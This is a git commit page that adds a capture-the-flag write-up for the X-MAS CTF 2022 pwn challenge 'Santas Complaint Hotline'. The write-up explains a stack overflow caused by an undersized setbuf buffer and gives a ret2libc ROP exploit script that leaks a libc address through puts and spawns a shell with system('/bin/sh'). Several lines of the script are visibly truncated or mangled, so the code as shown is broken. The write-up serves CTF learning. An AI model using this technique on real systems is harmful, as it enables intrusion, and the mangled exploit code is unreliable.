path: root/docs/writeups/X-MAS_CTF_2022
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authorMalfurious <>2022-12-23 16:13:20 -0500
committerMalfurious <>2022-12-23 16:13:20 -0500
commitb912d7f33f332d8279a04e225df23aa40b50c6a8 (patch)
tree96c74fb27f1a4637f45c1371e9bfb1d559b3edf0 /docs/writeups/X-MAS_CTF_2022
parent48f1e8450cfb85f9b9a66d48ddf92d963d1c4dfc (diff)
Writeup X-MAS CTF 2022 / Santas Complaint Hotline
Signed-off-by: Malfurious <>
Diffstat (limited to 'docs/writeups/X-MAS_CTF_2022')
1 files changed, 116 insertions, 0 deletions
diff --git a/docs/writeups/X-MAS_CTF_2022/Santas_Complaint_Hotline.txt b/docs/writeups/X-MAS_CTF_2022/Santas_Complaint_Hotline.txt
new file mode 100644
index 0000000..387be6e
--- /dev/null
+++ b/docs/writeups/X-MAS_CTF_2022/Santas_Complaint_Hotline.txt
@@ -0,0 +1,116 @@
+Have you ever wanted to have a place where you could express your biggest
+concerns about this year's X-MAS but didn't have a toll-free (taxes may apply)
+telephonic service at your disposal?
+Well, this year Santa took care of that!
+Category: pwn (50 points)
+Chall author: PinkiePie1189
+Writeup author: malfurious
+The scoreboard provides us with the executable, its libc binary, and
+linker/loader. The application is not stripped, so we see the functions,
+non-pic, so we have known memory addresses within it, and doesn't use stack
+canaries. However, NX is set, so no shellcode.
+The application just contains a main function, which performs the rough outline
+described below:
+ - setvbuf on stdin and stdout, to disable buffering
+ - fopen /dev/null in write mode
+ - setbuf on the devnull file, to establish a buffer on the stack for use
+ - puts a welcome message
+ - while user input != "done"
+ - fgets stdin to a stack buffer
+ - fwrite that buffer to the devnull file handle
+The buffer used to collect intermediate user input is actually properly guarded
+from buffer overruns by its fgets call, passing 0x200 for the size parameter.
+We are only able to overrun the stack frame because the additional stack buffer
+established by the prior setbuf call is not as long as libc mandates.
+From 'man setbuf':
+ void setbuf(FILE *restrict stream, char *restrict buf);
+ [The other three calls] are, in effect, simply aliases for calls to setvbuf().
+ The setbuf() function is exactly equivalent to the call
+ setvbuf(stream, buf, buf ? _IOFBF : _IONBF, BUFSIZ);
+BUFSIZ is the required size.
+ROP Exploit
+When the program writes to /dev/null, it writes the entire 0x200-byte temporary
+buffer, regardless of the amount of input received. So, our first couple writes
+can be empty lines. It takes 3 batches of input to get close to the end of the
+stack frame, and another 8 bytes to reach the saved RBP value exactly. You'll
+see a helper function in my exploit code that abstracts this process.
+I attempted a ret2libc to execute system("/bin/sh") and acquire a shell. So, we
+need to leak a libc address to calculate the mapped absolute addresses of the
+system function and its "/bin/sh" argument. I acheve this by ROP-ing to call
+the puts function with the address of the puts GOT entry as its argument (the
+GOT entry is already initialized because puts was called earlier in the program
+runtime). I finally return back to the program entry-point, to allow me to
+re-exploit having gained the leaked address. _start is chosen, rather than main,
+so that the stack is re-initialized and repaired from my damage.
+The second ROP chain is a straight-forward call to the library function, using
+the addresses resolved from the previous leak. My exploit code also calls
+exit(0) to attempt to exit cleanly.
+We require the use of a 'pop rdi; ret' gadget from the main executable, as well
+as a simple 'ret' gadget, used at the beginning of the second ROP chain to fixup
+the stack alignment prior to calling system.
+See my full sploit exploit script below.
+Solution (Python/sploit)
+#!/usr/bin/env sploit
+from sploit.payload import *
+from sploit.rev.elf import *
+from sploit.arch import *
+b = ELF("./chall")
+l = ELF("./")
+poprdi = b.egad("pop rdi;ret")
+ret = 0x00400886 # ret gadget
+def sendpld(p):
+ io.readline()
+ io.writeline()
+ io.writeline()
+ io.writeline(Payload().pad(8)()+p())
+ io.writeline(b'done')
+# Leak libc address
+ .ret(poprdi).int(b.sym._GOT_puts) # puts(&puts)
+ .ret(b.sym._PLT_puts)
+ .ret(b.sym._start)) # goto _start
+leak = btoi(io.readline()[:-1]) # strip \n char
+l.sym =, l.sym.puts) # update libc mapping based on puts function
+# Get shell
+ .ret(ret) # stack alignment
+ .ret(poprdi).int(l.sym._bin_sh) # system("/bin/sh")
+ .ret(l.sym.system)
+ .ret(poprdi).int(0) # exit(0)
+ .ret(l.sym.exit))